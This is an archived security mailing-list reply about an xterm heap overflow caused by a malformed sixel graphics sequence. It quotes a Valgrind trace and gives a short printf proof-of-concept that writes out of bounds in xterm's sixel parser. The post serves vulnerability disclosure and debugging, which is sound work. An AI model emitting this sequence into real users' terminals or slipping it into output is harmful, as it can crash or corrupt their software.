Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Sun, 30 Jan 2022 18:39:01 -0000 (UTC)
From: Tavis Ormandy <>
Subject: Re: xterm buffer overflow via crafted sixel

On 2022-01-30, nick black wrote:
> an error of mine own led to emission of a corrupted sixel [0], and
> spectacular gyrations from XTerm:
>==1426124== Invalid write of size 2
>==1426124==    at 0x193FF1: set_sixel (graphics_sixel.c:181)
>==1426124==    by 0x1949E1: parse_sixel (graphics_sixel.c:534)
>==1426124==    by 0x17203D: do_dcs (misc.c:4973)
>==1426124==    by 0x149E03: doparsing.constprop.0 (charproc.c:4224)
>==1426124==    by 0x14B383: VTparse (charproc.c:5183)
>==1426124==    by 0x14B670: VTRun (charproc.c:8163)
>==1426124==    by 0x12DC49: main (main.c:2911)
>==1426124==  Address 0xffffffff0941efb8 is not stack'd, malloc'd or (recently) free'd

I can repro here, here is a testcase:

printf "\ePq"
printf "#%hhu;2;%hhu;%hhu;%hhu" 0x41 100 100 100
printf "#%hhu!%u@" 0x41 0x7fffffff
printf "#%hhu!%u@" 0x41 0x7fffffff
printf "\e\\"

That should wrap context->col, and write a 'A' to graphic->pixels oob in

I use `XTerm*decTerminalID: vt382` in .Xresources, not sure if that matters.


 _o)            $ lynx
 /\\  _o)  _o)  $ finger
_\_V _( ) _( )  @taviso

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.